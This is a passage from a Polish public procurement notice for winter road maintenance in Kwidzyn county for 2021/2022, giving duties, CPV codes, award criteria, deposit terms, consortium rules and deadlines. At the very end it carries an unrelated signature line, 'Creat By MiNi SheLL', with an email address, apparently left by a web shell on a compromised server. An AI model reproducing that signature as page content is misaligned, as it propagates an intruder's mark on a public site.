śliskości na 100% długości dróg objętych ZUD mieszanką 30% soli z piaskiem w ilości minimum 120g/m²),<br/>5) usuwanie zatorów śnieżnych przy użyciu pługa wirnikowego lub innego sprzętu technicznego umożliwiającego usuwanie zatorów śnieżnych o<br/>wydajności nie mniejszej jak pług wirnikowy,<br/>6) likwidacja śliskości dróg jednojezdniowych na pełnej szerokości dwóch pasów ruchu, poprzez uszorstnianie mieszanką w ilości 120 g/ m2<br/>(przejazd 100% długości dróg objętych, uszorstnianie mieszanką 30% soli z piaskiem na zakrętach, wzniesieniach, spadkach, łukach,<br/>skrzyżowaniach tj. 50% długości dróg objętych ZUD),<br/>7) gotowość do świadczenia usług, polegająca na zapewnieniu dyspozycyjności sprzętu i pracowników odpowiedzialnych za należyte wykonanie<br/>usług.<br/>Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SWZ- szczegółowe zasady i warunki realizacji usług w ramach Zimowego<br/>Utrzymania Dróg Powiatowych (ZUD) na obszarze powiatu kwidzyńskiego.<br/>2.Nazwy i kody Wspólnego Słownik Zamówień (CPV):<br/>90620000-9 – usługi odśnieżania<br/>90630000-2 – usługi usuwania oblodzeń<br/>3.Zamawiający dopuszcza przy realizacji zamówienia zastosowanie urządzeń i materiałów równoważnych co do jakości i surowców użytych do<br/>ich wykonania do materiałów i urządzeń podanych w dokumentach zamówienia (SWZ wraz z załącznikami). 4.Jeśli w dokumentach zamówienia<br/>(SWZ wraz z załącznikami) wskazana jest nazwa handlowa firmy, towaru lub produktu, Zamawiający - w odniesieniu do wskazanych wprost w<br/>dokumentacji<br/>przetargowej parametrów, czy danych (technicznych lub jakichkolwiek innych), identyfikujących pośrednio lub bezpośrednio towar bądź produkt -<br/>dopuszcza rozwiązania równoważne zgodne z danymi technicznymi i parametrami zawartymi w w/w dokumentacji. Jako rozwiązania<br/>równoważne, należy rozumieć rozwiązania charakteryzujące się parametrami nie gorszymi od wymaganych, a znajdujących się w dokumentacji.<br/>5.Gdziekolwiek w dokumentach zamówienia (SWZ wraz z załącznikami) występują odniesienia do Polskich Norm, dopuszczalne jest stosowanie<br/>odpowiednich norm krajów Unii Europejskiej, w<br/>zakresie przyjętym przez polskie prawodawstwo.<br/>6.Wszędzie tam, gdzie dokumentach zamówienia (SWZ wraz z załącznikami), przy opisie zastosowanych materiałów lub urządzeń wskazano<br/>znaki towarowe, patenty lub pochodzenie przyjmuje się, że mogą być zastosowane materiały lub urządzenia równoważne. Wskazanie znaku<br/>towarowego, patentu lub pochodzenia ma charakter jedynie przykładowy i użyty jest w<br/>celu określenia standardów jakościowych i klasy, wymaganych w odniesieniu do stosowanych materiałów lub urządzeń. W przypadku, gdy<br/>powoływane normy i przepisy są państwowe lub odnoszą się do konkretnego kraju lub regionu, mogą być również stosowane inne odpowiednie<br/>normy zapewniające równy lub wyższy poziom wykonania niż powołane normy lub przepisy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">152 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie czasu wykonania akcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Oferta musi być zabezpieczona wadium w wysokości 1 800,00 zł (słownie: tysiąc osiemset złotych 00/100) jeżeli oferta została złożona na<br/>wszystkie zadania, a w przypadku złożenia oferty na pojedyncze zadania wadium wynosi:<br/>Część 1: 800,00<br/>Część 2:1 000,00<br/>2.Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej<br/>Agencji Rozwoju Przedsiębiorczości (Dz. U. 2019r. poz. 310, 836, 572).<br/>3.Wadium wniesione w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego w PBS w Kwidzynie nr rachunku 38-<br/>8300-0009-0013-5294-2000-0050, z dopiskiem na przelewie: postępowanie o udzielenie zamówienia klasycznego prowadzonego w trybie<br/>podstawowym- wariant I (bez negocjacji) pn. Zimowe utrzymanie dróg powiatowych na terenie powiatu w sezonie zimowym 2021/2022.<br/>4. W przypadku wnoszenia wadium w formie gwarancji lub poręczenia do oferty należy złożyć jej oryginał w postaci elektronicznej.<br/>5. Z treści gwarancji/ poręczenia musi jednoznacznie wynikać nieodwoływalne i bezwarunkowe, na każde żądanie zgłoszone przez<br/>zamawiającego, zobowiązanie gwaranta/ poręczyciela do zapłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98<br/>ust. 6 ustawy pzp. Ponadto powinien być wskazany termin obowiązywania gwarancji/ poręczenia, który nie może być krótszy niż termin<br/>związania ofertą.<br/>6.Wadium musi być wniesione przed terminem składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania oferta, z wyjątkiem<br/>przypadków, o których mowa niżej (stosownie do brzmienia przepisu art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy pzp).<br/>7.Przy wnoszeniu wadium Wykonawca powinien powołać się na oznaczenie postępowania.<br/>8. Zasady zwrotu oraz przesłanki zatrzymania wadium zostały określone w przepisie art. 98 ustawy pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia zamawiający bada, czy nie zachodzą podstawy wykluczenia<br/>wobec każdego z tych wykonawców.<br/>2.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, wskazane w załączniku nr 5 do SWZ składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>5.Zamawiający żąda wskazania przez wykonawcę, w ofercie, części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, oraz<br/>podania nazw ewentualnych podwykonawców, jeżeli są już znani (załącznik nr 4 do SWZ).<br/>6.W przypadku wspólnego ubiegania się o udzielenie zamówienia przez wykonawców, badanie braku podstaw do wykluczenia przeprowadzane<br/>będzie w odniesieniu do każdego z wykonawców.<br/>7.W formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8.Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego<br/>do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br/>9. Wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy.<br/>10. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do<br/>zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów.<br/>11. Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>12. W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio.<br/>13.W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać<br/>przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo reprezentowania<br/>w postępowaniu i<br/>zawarcia umowy. Pełnomocnictwo musi zostać złożone w formie określonej w rozdziale XVII SWZ.<br/>14.Pozostałe wymagania znajdują się we wcześniejszych sekcjach niniejszego ogłoszenia, stosownie do wymaganego zakresu informacji, a<br/>także wpostanowieniach SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 12 wzoru umowy stanowiącym załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-04 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34; dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-04 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia dla części nr 1 i 2:<br/>- sezon zimowy 2021/2022 : od dnia podpisania umowy przez 152 dni kalendarzowe<br/>Opis części zamówienia: 2 rejony zimowego utrzymania dróg (2 części zamówienia), zgodnie z załączonymi dokumentami- załącznik nr 2 do<br/>SWZ- opis dróg wraz z mapą.<br/>Część 1 dotyczy rejonu nr 2<br/>Część 2 dotyczy rejonu nr 3

Creat By MiNi SheLL
Email: jattceo@gmail.com